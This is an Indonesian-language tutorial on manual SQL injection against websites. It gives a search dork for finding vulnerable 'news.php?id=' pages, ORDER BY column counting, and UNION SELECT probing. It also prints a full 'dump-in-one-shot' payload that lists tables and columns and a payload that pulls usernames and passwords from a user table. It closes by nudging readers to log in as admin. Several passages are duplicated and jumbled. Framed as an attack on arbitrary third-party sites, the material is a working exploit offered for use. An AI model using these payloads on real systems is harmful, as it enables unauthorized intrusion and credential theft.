Hai Guys :)
Ketemu lagi dengan Saya :) ^_^
kali ini kita akan membahas tentang Tutorial Cara SQL Manual / SQLI istilahnya ya :v
Oke pertama kita dork dulu ya :)
Dorknya:
inrul:/news.php?id= site:com .net .id
kembangi lagi biar dapat prawan :v
Sekarang kita two the poin aja
target saya uda ada :)
https://site.com/berita.php?id=100'+union+select+1,Concat(0x3c43656e7465723e,0x496e6a656374696f6e204279204d72765f323331,0x3c62723e,0x3c62723e,Version(),0x3c62723e,Database(),0x3c62723e,User(),@C:=0x3c62723e,If((Select+Count(*)+From+Information_Schema.Columns+Where+Table_Schema=Database()+And+@C:=Concat(@C,0x3c62723e,Table_Name,0x3a,0x3a,0x3a,0x3a,Column_Name)),0x3a,0x00),@C)
yang Dios itu yang tadi ganti sama
Ketemu lagi dengan Saya :) ^_^
kali ini kita akan membahas tentang Tutorial Cara SQL Manual / SQLI istilahnya ya :v
Oke pertama kita dork dulu ya :)
Dorknya:
inrul:/news.php?id= site:com .net .id
kembangi lagi biar dapat prawan :v
Sekarang kita two the poin aja
target saya uda ada :)
Nah ini Target saya :)
Pertama kamu harus tambahkan sesuatu seperti (')
kan Web nya Blank berarti Vuln
sekarang kamu cari ordernya
sekarang kamu cari ordernya
contoh :
+order+by+1--+ ( no blank )
+order+by+2--+ (no blank )
+order+by+7--+ (no blank)
+order+by+7--+ (no blank)
+order+by+9--+ (blank)
cari dia sampai Blank
kan Blank dia No 8
nah kalian skrng https://site.com/berita.php?id=100'+union+select+1,2,3,4,5,6,7--+
untuk mecari angka togel :v
alian data bases nya
Ketemu kan Angka togelnya yang No. 2
sekarang kita Masukan Dios nya https://site.com/berita.php?id=100'+union+select+1,Concat(0x3c43656e7465723e,0x496e6a656374696f6e204279204d72765f323331,0x3c62723e,0x3c62723e,Version(),0x3c62723e,Database(),0x3c62723e,User(),@C:=0x3c62723e,If((Select+Count(*)+From+Information_Schema.Columns+Where+Table_Schema=Database()+And+@C:=Concat(@C,0x3c62723e,Table_Name,0x3a,0x3a,0x3a,0x3a,Column_Name)),0x3a,0x00),@C)
,3,4,5,6,7--+
kan ada no .2 itu kita ganti no.2 itu dengan Dios nya :)
nah kayak gini contoh nya tadi :)
sekarang kita akan mencari UserName dan Paswoardyang Dios itu yang tadi ganti sama
https://site.com/berita.php?id=100'+union+select+1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(h14471_13102016
.user)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x7e,password,0x3c62723e))))x)0
,3,4,5,6,7--+
nah ketemu kan username nya sama paswoard nya
kalau menemukan admin login pakai Otak kalian
Sekian Dari saya :)
Sekian Dari saya :)